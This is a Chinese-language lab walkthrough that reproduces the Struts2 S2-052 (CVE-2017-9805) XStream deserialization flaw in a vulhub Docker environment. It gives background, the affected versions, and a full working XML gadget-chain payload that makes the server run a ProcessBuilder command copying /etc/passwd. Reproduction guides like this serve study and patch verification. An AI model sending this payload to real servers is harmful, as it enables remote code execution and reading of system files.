漏洞复现之Struts2 反序列化漏洞(S2-052)

目录

• 漏洞复现之Struts2 反序列化漏洞
  • 基础知识
    • Struts2
    • Xstream组件
  • 漏洞简介
    • 形成原因
    • 漏洞编号
    • 漏洞危害
    • 影响版本
  • 环境搭建
  • 复现过程

漏洞复现之Struts2 反序列化漏洞

基础知识

Struts2

Apache Struts2是一种基于MVC的JavaWeb框架，可以理解为类似于Spring MVC和Spring Boot这种JavaWeb的框架。

Xstream组件

Xstream是Struts2中的一个组件，其主要的功能是：把对象转换成XML格式或者从XML格式反序列化成对象。

漏洞简介

形成原因

Struts2反序列化漏洞是由于Struts2中使用的Xstream组件在处理XML序列化时存安全问题，即：Xstream组件在解析用户提交的XML数据时，缺乏适当的输入验证和控制，导致攻击者可以在XML请求中嵌入特殊的payload，从而利用反序列化漏洞，进行远程代码执行。

漏洞编号

CVE-2017-9805（S2-052）

漏洞危害

远程代码执行等。

影响版本

Struts 2.1.2 — Struts 2.3.33

Struts 2.5 — Struts 2.5.12

环境搭建

攻击机：Kali（IP地址为：192.168.248.134）

复现过程

1、启动vulhub靶场环境，查看相应端口。

cd vulhub/struts2/s2-052
docker-compose up -d
docker-compose ps

2、访问漏洞所在的URL。

http://192.168.248.134:8080/orders.xhtml

3、抓取页面的任意数据包，然后将请求包进行修改。

（1）Get型请求改成POST请求。

（2）增加MIME类型字段。

Content-Type:application/xml

（3）增加请求体内容。

<map>
<entry>
     <jdk.nashorn.internal.objects.NativeString>
       <flags>0</flags>
       <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
         <dataHandler>
           <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
             <is class="javax.crypto.CipherInputStream">
               <cipher class="javax.crypto.NullCipher">
                 <initialized>false</initialized>
                 <opmode>0</opmode>
                 <serviceIterator class="javax.imageio.spi.FilterIterator">
                   <iter class="javax.imageio.spi.FilterIterator">
                     <iter class="java.util.Collections$EmptyIterator"/>
                     <next class="java.lang.ProcessBuilder">
                       <command>                                     //远程代码执行的命令
<string>cp</string>
<string>/etc/passwd</string>
<string>/tmp/611</string>
                       </command>
                       <redirectErrorStream>false</redirectErrorStream>
                     </next>
                   </iter>
                   <filter class="javax.imageio.ImageIO$ContainsFilter">
                     <method>
                       <class>java.lang.ProcessBuilder</class>
                       <name>start</name>
                       <parameter-types/>
                     </method>
                     <name>foo</name>
                   </filter>
                   <next class="string">foo</next>
                 </serviceIterator>
                 <lock/>
               </cipher>
               <input class="java.lang.ProcessBuilder$NullInputStream"/>
               <ibuffer/>
               <done>false</done>
               <ostart>0</ostart>
               <ofinish>0</ofinish>
               <closed>false</closed>
             </is>
             <consumed>false</consumed>
           </dataSource>
           <transferFlavors/>
         </dataHandler>
         <dataLen>0</dataLen>
       </value>
     </jdk.nashorn.internal.objects.NativeString>
     <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
   </entry>
   <entry>
     <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
     <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
   </entry>
 </map>

4、http请求构造完成后，发送请求数据包，由于我们的命令是将/etc/passwd文件复制到/tmp/611，因此可以查看对应目录中是否已经多了该文件。

注意：不是在攻击机的本机上去查看，是在攻击机中所起的docker环境中对应的目录去查看，因此要进入到docker环境中的目录。

cd vulhub/struts2/s2-052
docker ps                            //可以查看docker的容器ID号
docker exec -it af7 /binb/bash       //af7是在上一条命令的执行结果中，sturts2容器ID号的前三位。
cd /tmp
ls

5、文件成功被写入，漏洞利用成功。